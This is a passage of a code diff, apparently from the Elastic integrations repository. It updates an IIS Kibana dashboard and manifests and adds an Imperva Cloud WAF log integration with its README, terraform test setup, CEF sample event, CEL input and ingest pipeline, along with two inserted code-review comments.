"c4fcae80-9b09-45a1-9241-44cfcc6f3e9e" + ], + "layerId": "52e451a1-4048-4d1c-816d-2182732b5422", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" + }, + "seriesType": "line", + "xAccessor": "fabe5744-0cb2-4e51-99da-57d8b3f921e6", + "yConfig": [ + { + "axisMode": "left", + "color": "rgba(251,158,0,1)", + "forAccessor": "c4fcae80-9b09-45a1-9241-44cfcc6f3e9e" + } + ] + }, + { + "accessors": [ + "dc4c2d11-a5d5-4a2c-8dbf-7038bee99e64" + ], + "layerId": "5c6856ee-1070-44d9-b0df-f7505dfe9a66", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" }, - "enhancements": {}, - "hidePanelTitles": false + "seriesType": "line", + "xAccessor": "3250ccbb-fb22-4235-93cd-9e8929be30da", + "yConfig": [ + { + "axisMode": "left", + "color": "#68BC00", + 
"forAccessor": "dc4c2d11-a5d5-4a2c-8dbf-7038bee99e64" + } + ] + } + ], + "legend": { + "isVisible": true, + "maxLines": 1, + "position": "right", + "shouldTruncate": true, + "showSingleSeries": true }, - "gridData": { - "h": 14, - "i": "a3c9d1bc-611b-45aa-a3de-3750399f11e2", - "w": 24, - "x": 24, - "y": 21 + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "panelIndex": "a3c9d1bc-611b-45aa-a3de-3750399f11e2", - "title": "Total Bytes Transferred", - "type": "lens", - "version": "8.5.0" - } - ], - "timeRestore": false, - "title": "[Metrics IIS] Webserver Overview", - "version": 1 - }, - "coreMigrationVersion": "8.5.0", - "id": "iis-ebc23240-8572-11ea-91bc-ab084c7ec0e7", - "migrationVersion": { - "dashboard": "8.5.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "df67a70e-5ca5-4822-9abf-98f68987176b:indexpattern-datasource-layer-7d537da3-5163-404f-8219-5848d516628c", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "e2566135-ecc8-44a1-bbbd-9281dec8a9cc:indexpattern-datasource-layer-07e96b37-8ca1-4d7c-bb37-99e4caa36c6f", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "1798fa09-93f8-4dfc-85fa-6fc45fdd723a:indexpattern-datasource-layer-ec54661b-482d-438e-b841-7ef6909d49a4", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "73702fa8-d011-45cc-af6c-9dd7c55701d9:indexpattern-datasource-layer-3221f0ac-7ba8-4ca4-95fb-e81242261449", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "c523cd66-328a-41e9-bce9-1e1f95bae5de:indexpattern-datasource-layer-4c16bca9-c2d9-43d0-ae94-22640d5d1137", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "cbb280fb-dbc3-4b82-9c48-788c4254619d:indexpattern-datasource-layer-264d96bd-c47d-47c0-bb24-eb3d1a4dd46a", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": 
"89279953-dda3-4340-b049-bb52c2cbbeb8:indexpattern-datasource-layer-61df5fc7-b10c-4aba-9ef7-4f40a34d9419", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "89279953-dda3-4340-b049-bb52c2cbbeb8:indexpattern-datasource-layer-6cb1d19a-e033-4dc3-8aa4-0eef6b6ebb42", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "89279953-dda3-4340-b049-bb52c2cbbeb8:indexpattern-datasource-layer-8238eaa5-3c3c-46e9-9a09-abee137c1fbf", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "bb345920-7514-400f-a69e-be2625824248:indexpattern-datasource-layer-cfcc9b57-93b7-4830-9c93-82a29dc4aeee", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "d35799cc-1fd4-4ec8-8e94-56b5ee21cc69:indexpattern-datasource-layer-c8eba081-fa85-43a3-adee-81a6c126dd30", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "6df3b202-cc19-43fe-8832-499d8e22ac22:indexpattern-datasource-layer-8648361e-3dcc-4fc2-85cf-95c3e2f153fe", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "6df3b202-cc19-43fe-8832-499d8e22ac22:indexpattern-datasource-layer-bb78d828-0dd4-449f-afac-291527b423a0", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "a3c9d1bc-611b-45aa-a3de-3750399f11e2:indexpattern-datasource-layer-52e451a1-4048-4d1c-816d-2182732b5422", - "type": "index-pattern" + "valueLabels": "hide", + "valuesInLegend": true, + "yLeftExtent": { + "mode": "full" + }, + "yRightExtent": { + "mode": "full" + }, + "yTitle": "" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" }, - { - "id": "metrics-*", - "name": "a3c9d1bc-611b-45aa-a3de-3750399f11e2:indexpattern-datasource-layer-5c6856ee-1070-44d9-b0df-f7505dfe9a66", - "type": "index-pattern" - } + "title": "Total Bytes Transferred" + } ], - "type": "dashboard" + "timeRestore": false, + "title": "[Metrics IIS] Webserver Overview", + "version": 1 + }, + "references": [ + { + "id": 
"metrics-*", + "name": "df67a70e-5ca5-4822-9abf-98f68987176b:indexpattern-datasource-layer-7d537da3-5163-404f-8219-5848d516628c", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "e2566135-ecc8-44a1-bbbd-9281dec8a9cc:indexpattern-datasource-layer-07e96b37-8ca1-4d7c-bb37-99e4caa36c6f", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "1798fa09-93f8-4dfc-85fa-6fc45fdd723a:indexpattern-datasource-layer-ec54661b-482d-438e-b841-7ef6909d49a4", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "73702fa8-d011-45cc-af6c-9dd7c55701d9:indexpattern-datasource-layer-3221f0ac-7ba8-4ca4-95fb-e81242261449", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "c523cd66-328a-41e9-bce9-1e1f95bae5de:indexpattern-datasource-layer-4c16bca9-c2d9-43d0-ae94-22640d5d1137", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "cbb280fb-dbc3-4b82-9c48-788c4254619d:indexpattern-datasource-layer-264d96bd-c47d-47c0-bb24-eb3d1a4dd46a", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "89279953-dda3-4340-b049-bb52c2cbbeb8:indexpattern-datasource-layer-61df5fc7-b10c-4aba-9ef7-4f40a34d9419", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "89279953-dda3-4340-b049-bb52c2cbbeb8:indexpattern-datasource-layer-6cb1d19a-e033-4dc3-8aa4-0eef6b6ebb42", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "89279953-dda3-4340-b049-bb52c2cbbeb8:indexpattern-datasource-layer-8238eaa5-3c3c-46e9-9a09-abee137c1fbf", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "bb345920-7514-400f-a69e-be2625824248:indexpattern-datasource-layer-cfcc9b57-93b7-4830-9c93-82a29dc4aeee", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "d35799cc-1fd4-4ec8-8e94-56b5ee21cc69:indexpattern-datasource-layer-c8eba081-fa85-43a3-adee-81a6c126dd30", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": 
"6df3b202-cc19-43fe-8832-499d8e22ac22:indexpattern-datasource-layer-8648361e-3dcc-4fc2-85cf-95c3e2f153fe", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "6df3b202-cc19-43fe-8832-499d8e22ac22:indexpattern-datasource-layer-bb78d828-0dd4-449f-afac-291527b423a0", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "a3c9d1bc-611b-45aa-a3de-3750399f11e2:indexpattern-datasource-layer-52e451a1-4048-4d1c-816d-2182732b5422", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "a3c9d1bc-611b-45aa-a3de-3750399f11e2:indexpattern-datasource-layer-5c6856ee-1070-44d9-b0df-f7505dfe9a66", + "type": "index-pattern" + } + ], + "managed": false } \ No newline at end of file diff --git a/packages/iis/kibana/map/iis-0ac17980-e1d8-11ec-baf0-970634a1784d.json b/packages/iis/kibana/map/iis-0ac17980-e1d8-11ec-baf0-970634a1784d.json deleted file mode 100644 index 0ad48fcc218..00000000000 --- a/packages/iis/kibana/map/iis-0ac17980-e1d8-11ec-baf0-970634a1784d.json +++ /dev/null 
@@ -1,211 +0,0 @@ -{ - "attributes": { - "description": "", - "layerListJSON": [ - { - "alpha": 1, - "id": "5875b362-0633-4f76-a8d3-6e24337bacc0", - "includeInFitToBounds": true, - "label": null, - "maxZoom": 24, - "minZoom": 0, - "sourceDescriptor": { - "isAutoSelect": true, - "lightModeDefault": "road_map_desaturated", - "type": "EMS_TMS" - }, - "style": { - "type": "TILE" - }, - "type": "EMS_VECTOR_TILE", - "visible": true - }, - { - "alpha": 0.75, - "id": "cc7a42a7-7e5c-4ee5-90f3-972c488b05ee", - "includeInFitToBounds": true, - "joins": [], - "label": "Access map [Logs IIS]", - "maxZoom": 24, - "minZoom": 0, - "sourceDescriptor": { - "applyForceRefresh": true, - "applyGlobalQuery": true, - "applyGlobalTime": true, - "geoField": "source.geo.location", - "id": "bb680314-5606-4509-ac4f-f1089c1180db", - "indexPatternRefName": "layer_1_source_index_pattern", - "metrics": [ - { - "type": "count" - } - ], - "requestType": "point", - "resolution": "MOST_FINE", - "type": "ES_GEO_GRID" - }, - "style": { - "isTimeAware": true, - "properties": { - "fillColor": { - "options": { - "color": "Yellow to Red", - "colorCategory": "palette_0", - "field": { - "name": "doc_count", - "origin": "source" - }, - "fieldMetaOptions": { - "isEnabled": false, - "sigma": 3 - }, - "type": "ORDINAL" - }, - "type": "DYNAMIC" - }, - "icon": { - "options": { - "value": "marker" - }, - "type": "STATIC" - }, - "iconOrientation": { - "options": { - "orientation": 0 - }, - "type": "STATIC" - }, - "iconSize": { - "options": { - "field": { - "name": "doc_count", - "origin": "source" - }, - "fieldMetaOptions": { - "isEnabled": false, - "sigma": 3 - }, - "maxSize": 18, - "minSize": 7 - }, - "type": "DYNAMIC" - }, - "labelBorderColor": { - "options": { - "color": "#FFFFFF" - }, - "type": "STATIC" - }, - "labelBorderSize": { - "options": { - "size": "SMALL" - } - }, - "labelColor": { - "options": { - "color": "#000000" - }, - "type": "STATIC" - }, - "labelSize": { - "options": { - "size": 14 - }, - "type": 
"STATIC" - }, - "labelText": { - "options": { - "value": "" - }, - "type": "STATIC" - }, - "lineColor": { - "options": { - "color": "#3d3d3d" - }, - "type": "STATIC" - }, - "lineWidth": { - "options": { - "size": 1 - }, - "type": "STATIC" - }, - "symbolizeAs": { - "options": { - "value": "circle" - } - } - }, - "type": "VECTOR" - }, - "type": "GEOJSON_VECTOR", - "visible": true - } - ], - "mapStateJSON": { - "center": { - "lat": 19.94277, - "lon": 0 - }, - "filters": [], - "query": { - "language": "kuery", - "query": "" - }, - "refreshConfig": { - "interval": 0, - "isPaused": true - }, - "settings": { - "autoFitToDataBounds": false, - "backgroundColor": "#ffffff", - "browserLocation": { - "zoom": 2 - }, - "disableInteractive": false, - "disableTooltipControl": false, - "fixedLocation": { - "lat": 0, - "lon": 0, - "zoom": 2 - }, - "hideLayerControl": false, - "hideToolbarOverlay": false, - "hideViewControl": false, - "initialLocation": "LAST_SAVED_LOCATION", - "maxZoom": 24, - "minZoom": 0, - "showScaleControl": false, - "showSpatialFilters": true, - "showTimesliderToggleButton": true, - "spatialFiltersAlpa": 0.3, - "spatialFiltersFillColor": "#DA8B45", - "spatialFiltersLineColor": "#DA8B45" - }, - "timeFilters": { - "from": "now-15m", - "to": "now" - }, - "zoom": 1.58 - }, - "title": "Access map", - "uiStateJSON": { - "isLayerTOCOpen": true, - "openTOCDetails": [] - } - }, - "coreMigrationVersion": "8.5.0", - "id": "iis-0ac17980-e1d8-11ec-baf0-970634a1784d", - "migrationVersion": { - "map": "8.4.0" - }, - "references": [ - { - "id": "logs-*", - "name": "layer_1_source_index_pattern", - "type": "index-pattern" - } - ], - "type": "map" -} \ No newline at end of file diff --git a/packages/iis/manifest.yml b/packages/iis/manifest.yml index 7da448436c9..2850aee4caf 100644 --- a/packages/iis/manifest.yml +++ b/packages/iis/manifest.yml 
@@ -1,6 +1,6 @@
 name: iis
 title: IIS
-version: "1.17.3"
+version: "1.17.4"
 description: Collect logs and metrics from Internet Information Services (IIS) servers with Elastic Agent.
 type: integration
 icons:
diff --git a/packages/imperva/changelog.yml b/packages/imperva/changelog.yml
index 7a1c2d6a1ea..0c57bdd02e8 100644
--- a/packages/imperva/changelog.yml
+++ b/packages/imperva/changelog.yml
@@ -1,4 +1,9 @@
 # newer versions go on top
+- version: "1.1.0"
+ changes:
+ - description: Update package spec to 3.0.3.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9235
 - version: "1.0.1"
 changes:
 - description: Changed owners
diff --git a/packages/imperva/manifest.yml b/packages/imperva/manifest.yml
index 8521c6ca96b..d201b15d58b 100644
--- a/packages/imperva/manifest.yml
+++ b/packages/imperva/manifest.yml
@@ -1,7 +1,7 @@
-format_version: 3.0.0
+format_version: 3.0.3
 name: imperva
 title: Imperva
-version: "1.0.1"
+version: "1.1.0"
 description: Collect logs from Imperva devices with Elastic Agent.
 categories: ["network", "security"]
 type: integration
diff --git a/packages/imperva_cloud_waf/_dev/build/build.yml b/packages/imperva_cloud_waf/_dev/build/build.yml
new file mode 100644
index 00000000000..71f48ba2a9c
--- /dev/null
+++ b/packages/imperva_cloud_waf/_dev/build/build.yml
@@ -0,0 +1,4 @@
+dependencies:
+ ecs:
+ reference: "git@v8.11.0"
+ import_mappings: true
diff --git a/packages/imperva_cloud_waf/_dev/build/docs/README.md b/packages/imperva_cloud_waf/_dev/build/docs/README.md
new file mode 100644
index 00000000000..26708cb53d0
--- /dev/null
+++ b/packages/imperva_cloud_waf/_dev/build/docs/README.md
@@ -0,0 +1,96 @@ +# Imperva Cloud WAF + +Imperva Cloud WAF is a cloud-based application delivery service that includes web security, DDoS protection, CDN, and load balancing. + +## Data streams + +This integration supports ingestion of events from Imperva Cloud WAF, via AWS S3 input or via [Imperva API](https://docs.imperva.com/bundle/cloud-application-security/page/settings/log-integration.htm). + +**Event** is used to retrieve access and security events. See more details in the documentation [here](https://docs.imperva.com/bundle/cloud-application-security/page/more/log-file-structure.htm). + +## Requirements + +Elastic Agent must be installed. For more information, refer to the link [here](https://www.elastic.co/guide/en/fleet/current/elastic-agent-installation.html). + +### Installing and managing an Elastic Agent: + +You have a few options for installing and managing an Elastic Agent: + +### Install a Fleet-managed Elastic Agent (recommended): + +With this approach, you install Elastic Agent and use Fleet in Kibana to define, configure, and manage your agents in a central location. We recommend using Fleet management because it makes the management and upgrade of your agents considerably easier. + +### Install Elastic Agent in standalone mode (advanced users): + +With this approach, you install Elastic Agent and manually configure the agent locally on the system where it’s installed. You are responsible for managing and upgrading the agents. This approach is reserved for advanced users only. + +### Install Elastic Agent in a containerized environment: + +You can run Elastic Agent inside a container, either with Fleet Server or standalone. Docker images for all versions of Elastic Agent are available from the Elastic Docker registry, and we provide deployment manifests for running on Kubernetes. 
+ +There are some minimum requirements for running Elastic Agent and for more information, refer to the link [here](https://www.elastic.co/guide/en/fleet/current/elastic-agent-installation.html). + +The minimum **Kibana version** required is **8.10.1**. + +## Setup + +### Steps to setup Amazon S3 Connection(Push Mode): + +1. Login to your [Imperva Cloud WAF console](https://authentication-management.service.imperva.com/login). +2. On the sidebar, click Logs > Log Setup. +3. Connection. Select **Amazon S3**. +4. Next, fill in your credentials: + Your S3 Access key, Secret key, and Path, where path is the location of the folder where you want to store the logs. Enter the path in the following format: /. For example: MyBucket/MyIncapsulaLogFolder. +5. Click Test connection to perform a full testing cycle in which a test file will be transferred to your designated folder. The test file does not contain real data, and will be removed by Incapsula when the transfer is complete. +6. Configure the additional options: + - Format. Select the format for the log files: CEF + - Compress logs. By default, log files are compressed. Clear this option to keep the logs uncompressed. + +### Steps to obtain API URL, API Key and API ID(Pull Mode): + +1. Login to your [Imperva Cloud WAF console](https://authentication-management.service.imperva.com/login). +2. On the sidebar, click Logs > Log Setup. +3. Connection. Select **Imperva API**. +4. From this window copy and keep API Key handy, this will be required for further Integration configuration. +5. Copy **API ID** and **Log Server URI**. +6. Configure the additional options: + - Format. Select the format for the log files: CEF + - Compress logs. By default, log files are compressed. Clear this option to keep the logs uncompressed. + +### Enabling the integration in Elastic: + +1. In Kibana go to Management > Integrations +2. In "Search for integrations" search bar, type Imperva Cloud WAF +3. 
Click on the "Imperva Cloud WAF" integration from the search results. +4. Click on the "Add Imperva Cloud WAF" button to add the integration. +5. While adding the integration, if you want to collect logs via AWS S3, keep **Collect Imperva Cloud WAF logs via AWS S3 or AWS SQS** toggle on and then configure following parameters: + - access key id + - secret access key + - bucket arn + - collect logs via S3 Bucket toggled on + + or if you want to collect logs via AWS SQS, keep **Collect Imperva Cloud WAF logs via AWS S3 or AWS SQS** toggle on and then configure following parameters: + - access key id + - secret access key + - queue url + - collect logs via S3 Bucket toggled off + + or if you want to collect logs via API, keep **Collect Imperva Cloud WAF logs via API** toggle on and and then configure following parameters: + - API ID + - API Key + - URL +6. Save the integration. + +**NOTE**: There are other input combination options available for AWS S3 input, please check [here](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-aws-s3.html). + +## Logs Reference + +### Event + +This is the `Event` dataset. + +#### Example + +{{event "event"}} + +{{fields "event"}} diff --git a/packages/imperva_cloud_waf/_dev/deploy/tf/env.yml b/packages/imperva_cloud_waf/_dev/deploy/tf/env.yml new file mode 100644 index 00000000000..aee5f1c5900 --- /dev/null +++ b/packages/imperva_cloud_waf/_dev/deploy/tf/env.yml @@ -0,0 +1,9 @@ +version: '2.3' +services: + terraform: + environment: + - AWS_ACCESS_KEY_ID=${AWS_ACCESS_KEY_ID} + - AWS_SECRET_ACCESS_KEY=${AWS_SECRET_ACCESS_KEY} + - AWS_SESSION_TOKEN=${AWS_SESSION_TOKEN} + - AWS_DEFAULT_PROFILE=${AWS_DEFAULT_PROFILE} + - AWS_REGION=${AWS_REGION:-us-east-1} diff --git a/packages/imperva_cloud_waf/_dev/deploy/tf/files/test-events.log b/packages/imperva_cloud_waf/_dev/deploy/tf/files/test-events.log new file mode 100644 index 00000000000..668c362f5bd --- /dev/null 
+++ b/packages/imperva_cloud_waf/_dev/deploy/tf/files/test-events.log @@ -0,0 +1,8 @@ +accountId:123456 +configId:12345 +checksum:123ab7746e2c163e9e56d0ec123456 +format:CEF +startTime:1705705619206 +endTime:1705705805378 +|==| +CEF:0|Incapsula|SIEMintegration|1|1|Normal|0| sourceServiceName=site123.abcd.info siteid=1509732 suid=50005477 requestClientApplication=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 deviceFacility=mia ccode=IL tag=www.elvis.com cicode=Rehovot cs7=31.8969 cs7Label=latitude cs8=34.8186 cs8Label=longitude Customer=CEFcustomer123 siteTag=my-site-tag start=1453290121336 request=site123.abcd.info/main.css ref=www.incapsula.com/lama requestmethod=GET cn1=200 app=HTTP deviceExternalID=33411452762204224 in=54 xff=44.44.44.44 cpt=443 src=12.12.12.12 ver=TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 end=1566300670892 additionalReqHeaders=[{"Accept":"*/*"},{"x-v":"1"},{"x-fapi-interaction-id":"10.10.10.10"}] additionalResHeaders=[{"Content-Type":"text/html; charset\=UTF-8"}] diff --git a/packages/imperva_cloud_waf/_dev/deploy/tf/main.tf b/packages/imperva_cloud_waf/_dev/deploy/tf/main.tf new file mode 100644 index 00000000000..95965d7082d --- /dev/null +++ b/packages/imperva_cloud_waf/_dev/deploy/tf/main.tf 
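Review bot: The fixture uses routable addresses (`src=12.12.12.12`, `xff=44.44.44.44`) and real-looking host names (`tag=www.elvis.com`, `ref=www.incapsula.com/lama`) rather than documentation values; since this file is committed to a public repository and uploaded to the test bucket by the terraform deploy, swapping them for RFC 5737 addresses (e.g. `192.0.2.10`) and `example.com` names keeps test data from pointing at third parties. The sample also spells the request identifier `deviceExternalID`, whereas the ingest pipeline in this PR renames `cef.extensions.deviceExternalId`; it is worth confirming which casing Imperva actually emits so the fixture exercises that processor.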
@@ -0,0 +1,57 @@ +provider "aws" { + region = "us-east-1" + default_tags { + tags = { + environment = var.ENVIRONMENT + repo = var.REPO + branch = var.BRANCH + build = var.BUILD_ID + created_date = var.CREATED_DATE + } + } +} + +resource "aws_s3_bucket" "bucket" { + bucket = "elastic-package-imperva-cloud-waf-bucket-${var.TEST_RUN_ID}" +} + +resource "aws_sqs_queue" "queue" { + name = "elastic-package-imperva-cloud-waf-queue-${var.TEST_RUN_ID}" + policy = < 0 ? + state + : + request("GET", ( state.url + "logs.index")).with({ + "Header":{ + "Authorization": ["Basic "+string(base64(state.user+":"+state.password))], + } + }).do_request().as(resp, bytes(resp.Body).as(body, { + "worklist": ( + has(state.cursor) && has(state.cursor.log_file) && state.cursor.log_file != null + ? + string(body).split(state.cursor.log_file)[1].split("\n").filter(x,x!="").map(x,{"filename":x}) + : + string(body).split("\n").map(x,{"filename":x}) + ), + "next": 0, + })) + ).as(v, v.next < size(v.worklist) ? + ( + request("GET", + state.url+v.worklist[v.next].filename + ).with({ + "Header":{ + "Authorization": ["Basic "+string(base64(state.user + ":" + state.password))], + } + }).do_request().as(resp, bytes(resp.Body).as(body, { + "events": string(body).split("|==|")[1].split("\n").filter(x,x!="").map(x,{"message":x}), + "cursor": { + "log_file": ( + has(state.cursor) && has(state.cursor.log_file) && state.cursor.log_file != null + ? + ( + (v.worklist[v.next].filename).split(".")[0] != (state.cursor.log_file).split(".")[0] ? + v.worklist[v.next].filename + : + state.cursor.log_file + ) + : + v.worklist[v.next].filename + ) + }, + "worklist": (int(v.next)+1) < size(v.worklist) ? v.worklist : [], + "next": (int(v.next)+1) < size(v.worklist) ? 
(int(v.next)+1) : 0, + "want_more": (int(v.next)+1) < size(v.worklist), + "user": state.user, + "password": state.password + })) + ) + : + { + "events": [], + "want_more": false, + "user": state.user, + "password": state.password, + "cursor": { + "log_file": has(state.cursor) && has(state.cursor.log_file) ? state.cursor.log_file : null + } + } + ) +tags: +{{#if preserve_original_event}} + - preserve_original_event +{{/if}} +{{#if preserve_duplicate_custom_fields}} + - preserve_duplicate_custom_fields +{{/if}} +{{#each tags as |tag|}} + - {{tag}} +{{/each}} +{{#contains "forwarded" tags}} +publisher_pipeline.disable_host: true +{{/contains}} +processors: +- rename: + fields: + - {from: "message", to: "event.original"} +- decode_cef: + field: event.original +{{#if processors}} +{{processors}} +{{/if}} diff --git a/packages/imperva_cloud_waf/data_stream/event/elasticsearch/ingest_pipeline/default.yml b/packages/imperva_cloud_waf/data_stream/event/elasticsearch/ingest_pipeline/default.yml new file mode 100644 index 00000000000..62667194526 --- /dev/null +++ b/packages/imperva_cloud_waf/data_stream/event/elasticsearch/ingest_pipeline/default.yml 
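Review bot: `string(body).split(state.cursor.log_file)[1]` in the worklist construction assumes the stored `log_file` name is still present in `logs.index`; once that file has rotated out, `split` returns a single element, the `[1]` index raises, and because the program is one expression the input fails on every run until the cursor is cleared. Guarding the lookup, e.g. `string(body).contains(state.cursor.log_file) ? string(body).split(state.cursor.log_file)[1] : string(body)` before the `.split("\n")`, lets collection resume (whether the fallback re-reads the whole index or skips is a design choice that deserves a comment). The no-cursor branch also lacks the `.filter(x, x != "")` that the cursor branch applies, so a trailing newline in the index yields a `{"filename": ""}` entry and a request to the bare `state.url`. The opening lines of this program, including how `state.url` and the credentials are set up, are not legible in this view and could not be checked.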
@@ -0,0 +1,643 @@ +--- +description: Pipeline for processing event logs. +processors: + - set: + field: ecs.version + tag: set_ecs_version + value: 8.11.0 + - set: + field: event.kind + tag: set_event_kind_alert + value: alert + if: ctx.cef?.name != "Normal" + - set: + field: event.kind + tag: set_event_kind_event + value: event + if: ctx.cef?.name == "Normal" + - set: + field: event.category + tag: set_event_category_web + value: [web] + - set: + field: event.type + tag: set_event_type_info + value: [info] + - fingerprint: + fields: + - file.inode + - event.start + - event.end + tag: fingerprint_processor + target_field: '_id' + ignore_missing: true + - rename: + field: cef.device.event_class_id + tag: rename_device_event_class_id + target_field: imperva_cloud_waf.event.device.event_class_id + ignore_missing: true + - rename: + field: cef.device.product + tag: rename_device_product + target_field: imperva_cloud_waf.event.device.product + ignore_missing: true + - rename: + field: cef.device.vendor + tag: rename_device_vendor + target_field: imperva_cloud_waf.event.device.vendor + ignore_missing: true + - rename: + field: cef.device.version + tag: rename_device_version + target_field: imperva_cloud_waf.event.device.version + ignore_missing: true + - rename: + field: cef.extensions.deviceAction + tag: rename_extensions_deviceAction + target_field: imperva_cloud_waf.event.extensions.action + ignore_missing: true + - lowercase: + field: event.action + tag: lowercase_event_action + ignore_missing: true + - gsub: + field: event.action + pattern: '_' + replacement: '-' + tag: gsub_event_action + ignore_missing: true + on_failure: + - remove: + field: event.action + ignore_missing: true + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - json: + field: 
cef.extensions.additionalReqHeaders + tag: json_extensions_additionalReqHeaders + target_field: imperva_cloud_waf.event.extensions.additional.req_headers + if: ctx.cef?.extensions?.additionalReqHeaders != null && ctx.cef.extensions.additionalReqHeaders != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - json: + field: cef.extensions.additionalResHeaders + tag: json_extensions_additionalResHeaders + target_field: imperva_cloud_waf.event.extensions.additional.res_headers + if: ctx.cef?.extensions?.additionalResHeaders != null && ctx.cef.extensions.additionalResHeaders != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: cef.extensions.applicationProtocol + tag: rename_extensions_applicationProtocol + target_field: imperva_cloud_waf.event.extensions.application_protocol + ignore_missing: true + - lowercase: + field: network.application + tag: lowercase_network_application + ignore_missing: true + - convert: + field: cef.extensions.bytesIn + tag: convert_extensions_bytesIn_to_long + target_field: imperva_cloud_waf.event.extensions.bytes_in + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: cef.extensions.ccode + tag: rename_extensions_ccode + target_field: imperva_cloud_waf.event.extensions.ccode + ignore_missing: true + - set: + field: source.geo.country_iso_code + tag: 
set_source_geo_country_iso_code_from_event_extensions_ccode + copy_from: imperva_cloud_waf.event.extensions.ccode + ignore_empty_value: true + - rename: + field: cef.extensions.cicode + tag: rename_extensions_cicode + target_field: imperva_cloud_waf.event.extensions.cicode + ignore_missing: true + - json: + field: cef.extensions.cs10 + tag: json_extensions_cs10 + target_field: imperva_cloud_waf.event.extensions.cs10 + if: ctx.cef?.extensions?.cs10 != null && ctx.cef.extensions.cs10 != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: cef.extensions.cs10Label + tag: rename_extensions_cs10Label + target_field: imperva_cloud_waf.event.extensions.cs10Label + ignore_missing: true + - json: + field: cef.extensions.cs11 + tag: json_extensions_cs11 + target_field: imperva_cloud_waf.event.extensions.cs11 + if: ctx.cef?.extensions?.cs11 != null && ctx.cef.extensions.cs11 != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: cef.extensions.cs11Label + tag: rename_extensions_cs11Label + target_field: imperva_cloud_waf.event.extensions.cs11Label + ignore_missing: true + - convert: + field: cef.extensions.cs7 + tag: convert_extensions_cs7_to_double + target_field: imperva_cloud_waf.event.extensions.cs7 + type: double + ignore_missing: true + if: ctx.cef?.extensions?.cs7 != null && ctx.cef.extensions.cs7 != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with 
message: {{{_ingest.on_failure_message}}}' + - rename: + field: cef.extensions.cs7Label + tag: rename_extensions_cs7Label + target_field: imperva_cloud_waf.event.extensions.cs7Label + ignore_missing: true + - convert: + field: cef.extensions.cs8 + tag: convert_extensions_cs8_to_double + target_field: imperva_cloud_waf.event.extensions.cs8 + type: double + ignore_missing: true + if: ctx.cef?.extensions?.cs8 != null && ctx.cef.extensions.cs8 != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: cef.extensions.cs8Label + tag: rename_extensions_cs8Label + target_field: imperva_cloud_waf.event.extensions.cs8Label + ignore_missing: true + - set: + field: source.geo.location.lat + tag: set_source_geo_location_lat_from_event_extensions_cs7 + copy_from: imperva_cloud_waf.event.extensions.cs7 + 